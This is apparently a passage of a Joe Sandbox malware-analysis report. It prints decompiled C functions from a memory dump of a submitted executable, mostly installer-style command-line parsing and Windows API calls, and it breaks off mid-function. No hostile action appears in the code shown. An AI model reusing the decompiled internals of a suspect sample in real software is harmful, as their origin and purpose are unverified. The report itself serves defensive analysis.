                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                              • Opcode ID: 1c16ec555212d4e3c112d81d7055262f432d67be0523d592882b2c9376211366
                                                                                                                                                                                                                                              • Instruction ID: ff404a3c21344a7ce246afeb00a4ea6244a60f0fef1b28a02fc1746c37eb8b9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c16ec555212d4e3c112d81d7055262f432d67be0523d592882b2c9376211366
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5F04C33108A519BD332091D9884B66BFDE9BC6350F28856EF8DEC3205DA659C45E3A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E0097621E() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					0x4f0 = 2;
                                                                                                                                                                                                                                              					_t9 = E0097597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E009744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					_t9 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0097623F
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 381621628-0
                                                                                                                                                                                                                                              • Opcode ID: 7decc4b09584055a04c01e2fb481acbf1dd8caebf36bb137dd2b3c59faebfb47
                                                                                                                                                                                                                                              • Instruction ID: 0ee40a997abd3ee2d4900742cc6057268c30d1832f4d026e734e87b15338eb9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7decc4b09584055a04c01e2fb481acbf1dd8caebf36bb137dd2b3c59faebfb47
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F0E972704208ABE790EB748D06FBE37ACDBC4700F408469BA8DD6092ED749D849650
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00974B60(signed int _a4) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t15 + 0x978d64)) != 1) {
                                                                                                                                                                                                                                              					_t9 = FindCloseChangeNotification( *(_t15 + 0x978d74)); // executed
                                                                                                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                                                                                                              						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0x978d60)) = 1;
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d60)) = 1;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d68)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d70)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d6c)) = 0;
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}






APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00974FA1,00000000), ref: 00974B98
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 77cd980a9777c909a90651445a39838cb49a7c9d3dc8e404ec046a9a9dbac7ee
• Instruction ID: 17216285aba23f6c1c8c324db7d13ec74d59124e1319bdfc0297366c275ce308
• Opcode Fuzzy Hash: 77cd980a9777c909a90651445a39838cb49a7c9d3dc8e404ec046a9a9dbac7ee
• Instruction Fuzzy Hash: 9EF0FE73684B08DE47718E398C09657BBE8AAD53A1710492A946ED21D1FB30AC41DB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E009766AE(CHAR* __ecx) {
	unsigned int _t1;

	_t1 = GetFileAttributesA(__ecx); // executed
	if(_t1 != 0xffffffff) {
		return  !(_t1 >> 4) & 0x00000001;
	} else {
		return 0;
	}
}





APIs
• GetFileAttributesA.KERNELBASE(?,00974777,?,00974E38,?), ref: 009766B1
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 3c31dd7371e205f981d7a136a85c8f8b84b4daaa042ca1d6d30b0ec709afd0f1
• Instruction ID: 097bb2f0e166b207d52f560eada93882669caf5dcd72c3998d1d5eecb3c36010
• Opcode Fuzzy Hash: 3c31dd7371e205f981d7a136a85c8f8b84b4daaa042ca1d6d30b0ec709afd0f1
• Instruction Fuzzy Hash: 3AB09277236840426E2006316C2955A2845B6C223A7E85B90F03AC01E0DA3EC886E004
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00974CA0(long _a4) {
	void* _t2;

	_t2 = GlobalAlloc(0, _a4); // executed
	return _t2;
}





APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00974CAA
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: fb88c65b08c59dff2a937e8b500ad59515f36683870af7f0de5e0bc3a616f04c
• Instruction ID: bfece6c109d14248f037f70aa2f657922d6aa3fd704a16067acfe09cb2bb65b0
• Opcode Fuzzy Hash: fb88c65b08c59dff2a937e8b500ad59515f36683870af7f0de5e0bc3a616f04c
• Instruction Fuzzy Hash: D9B0123304820CB7CF001FC2EC09F893F5DF7C5771F140000F60C450508A729450969A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00974CC0(void* _a4) {
	void* _t2;

	_t2 = GlobalFree(_a4); // executed
	return _t2;
}





APIs
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 98c72cfb1c630024a448413f4c2679d25aadb92f9641b5d6bb2977dfe00784e1
• Instruction ID: 9afe2095f5767586f1f3b62c5da8da6b5d54c7e4548a21d7e0aafc14a7abf2e8
• Opcode Fuzzy Hash: 98c72cfb1c630024a448413f4c2679d25aadb92f9641b5d6bb2977dfe00784e1
• Instruction Fuzzy Hash: 3EB0123200410CBB8F001B42EC088493F1DD6C12707000010F50C410218B3398519589
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E00975C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				CHAR* _v265;
                                                                                                                                                                                                                                              				char _v266;
                                                                                                                                                                                                                                              				char _v267;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				CHAR* _v272;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				signed int _v296;
                                                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				CHAR* _t69;
                                                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				char _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				void* _t132;
                                                                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                                                                              				signed int _t143;
                                                                                                                                                                                                                                              				CHAR* _t144;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				void* _t146;
                                                                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                                                                              				char _t155;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                                                              				char _t167;
                                                                                                                                                                                                                                              				char _t170;
                                                                                                                                                                                                                                              				CHAR* _t173;
                                                                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                                                                              				CHAR* _t199;
                                                                                                                                                                                                                                              				void* _t200;
                                                                                                                                                                                                                                              				CHAR* _t201;
                                                                                                                                                                                                                                              				void* _t205;
                                                                                                                                                                                                                                              				void* _t206;
                                                                                                                                                                                                                                              				int _t209;
                                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                                              				void* _t213;
                                                                                                                                                                                                                                              				CHAR* _t218;
                                                                                                                                                                                                                                              				intOrPtr* _t219;
                                                                                                                                                                                                                                              				intOrPtr* _t220;
                                                                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                                                                              				_t61 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                                                                              				_t209 = 1;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					while(_t209 != 0) {
                                                                                                                                                                                                                                              						_t67 =  *_t173;
                                                                                                                                                                                                                                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                              							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v272 = _t173;
                                                                                                                                                                                                                                              						if(_t67 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t69 = _v272;
                                                                                                                                                                                                                                              							_t177 = 0;
                                                                                                                                                                                                                                              							_t213 = 0;
                                                                                                                                                                                                                                              							_t163 = 0;
                                                                                                                                                                                                                                              							_t202 = 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								if(_t213 != 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t69 =  *_t69;
                                                                                                                                                                                                                                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t69 = _v272;
                                                                                                                                                                                                                                              										L21:
                                                                                                                                                                                                                                              										_t155 =  *_t69;
                                                                                                                                                                                                                                              										if(_t155 != 0x22) {
                                                                                                                                                                                                                                              											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              												goto L106;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                              												_t177 = _t177 + 1;
                                                                                                                                                                                                                                              												_t202 = _t202 + 1;
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                              												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              													L106:
                                                                                                                                                                                                                                              													_t63 = 0;
                                                                                                                                                                                                                                              													L125:
                                                                                                                                                                                                                                              													_pop(_t210);
                                                                                                                                                                                                                                              													_pop(_t212);
                                                                                                                                                                                                                                              													_pop(_t162);
                                                                                                                                                                                                                                              													return E00976CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                              													_t177 = _t177 + 1;
                                                                                                                                                                                                                                              													_t202 = _t202 + 1;
                                                                                                                                                                                                                                              													_t157 = 2;
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												if(_t213 != 0) {
                                                                                                                                                                                                                                              													_t163 = 1;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t213 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L131;
                                                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                                                              								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                              								_t69 = _v272;
                                                                                                                                                                                                                                              							} while ( *_t69 != 0);
                                                                                                                                                                                                                                              							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                              								E00976E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                              								asm("int3");
                                                                                                                                                                                                                                              								_push(_t221);
                                                                                                                                                                                                                                              								_t222 = _t223;
                                                                                                                                                                                                                                              								_t71 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                              									0x4f0 = 2;
                                                                                                                                                                                                                                              									_t75 = E0097597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E009744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                              									 *0x979124 = E00976285();
                                                                                                                                                                                                                                              									_t75 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								return E00976CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                              								if(_t213 == 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										goto L34;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L40;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										_t79 = _v268;
                                                                                                                                                                                                                                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                              											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                              											if(_t83 == 0) {
                                                                                                                                                                                                                                              												_t202 = 0x521;
                                                                                                                                                                                                                                              												E009744B9(0, 0x521, 0x971140, 0, 0x40, 0);
                                                                                                                                                                                                                                              												_t85 =  *0x978588; // 0x0
                                                                                                                                                                                                                                              												if(_t85 != 0) {
                                                                                                                                                                                                                                              													CloseHandle(_t85);
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t87 = _t83 - 4;
                                                                                                                                                                                                                                              											if(_t87 == 0) {
                                                                                                                                                                                                                                              												if(_v266 != 0) {
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t50;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t88 =  *_t183;
                                                                                                                                                                                                                                              															_t183 = _t183 + 1;
                                                                                                                                                                                                                                              														} while (_t88 != 0);
                                                                                                                                                                                                                                              														if(_t183 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t205 = 0x5b;
                                                                                                                                                                                                                                              															if(E0097667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                              																L115:
                                                                                                                                                                                                                                              																_t206 = 0x5d;
                                                                                                                                                                                                                                              																if(E0097667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                              																	L117:
                                                                                                                                                                                                                                              																	_t202 =  &_v276;
                                                                                                                                                                                                                                              																	_v276 = _t167;
                                                                                                                                                                                                                                              																	if(E00975C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t202 = 0x104;
                                                                                                                                                                                                                                              																		E00971680(0x978c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t202 = 0x5b;
                                                                                                                                                                                                                                              																	if(E0097667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		goto L117;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t202 = 0x5d;
                                                                                                                                                                                                                                              																if(E0097667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L115;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
													}
												} else {
													 *0x978a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00975C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x978b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x978a3a;
																}
																E00971680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0097658A(_t218, 0x104, 0x971140);
																if(E009731E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x978a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x978a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x978a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x978a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x978a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x979a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x979a2c =  *0x979a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
                                                                                                                                                                                                                                              																						 *0x978d48 =  *0x978d48 | 0x00000040;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                              																						if(_t146 == 0) {
                                                                                                                                                                                                                                              																							 *0x979a2c =  *0x979a2c & 0xfffffffd;
                                                                                                                                                                                                                                              																							goto L70;
                                                                                                                                                                                                                                              																						} else {
                                                                                                                                                                                                                                              																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                              																							if(_t147 == 0) {
                                                                                                                                                                                                                                              																								 *0x979a2c =  *0x979a2c & 0xfffffffe;
                                                                                                                                                                                                                                              																								goto L70;
                                                                                                                                                                                                                                              																							} else {
                                                                                                                                                                                                                                              																								_t149 = _t147;
                                                                                                                                                                                                                                              																								if(_t149 == 0) {
                                                                                                                                                                                                                                              																									 *0x978d48 =  *0x978d48 | 0x00000080;
                                                                                                                                                                                                                                              																								} else {
                                                                                                                                                                                                                                              																									if(_t149 == 3) {
                                                                                                                                                                                                                                              																										 *0x979a2c =  *0x979a2c | 0x00000004;
                                                                                                                                                                                                                                              																										L70:
                                                                                                                                                                                                                                              																										 *0x978a28 = 1;
                                                                                                                                                                                                                                              																									} else {
                                                                                                                                                                                                                                              																										_t209 = 0;
                                                                                                                                                                                                                                              																									}
                                                                                                                                                                                                                                              																								}
                                                                                                                                                                                                                                              																							}
                                                                                                                                                                                                                                              																						}
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t144 =  *_t220;
                                                                                                                                                                                                                                              																				_t201 = _t144;
                                                                                                                                                                                                                                              																			} while (_t144 != 0);
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	 *0x979a2c = 3;
                                                                                                                                                                                                                                              																	 *0x978a28 = 1;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																goto L50;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																if(_t132 == 0) {
                                                                                                                                                                                                                                              																	goto L98;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	L49:
                                                                                                                                                                                                                                              																	_t209 = 0;
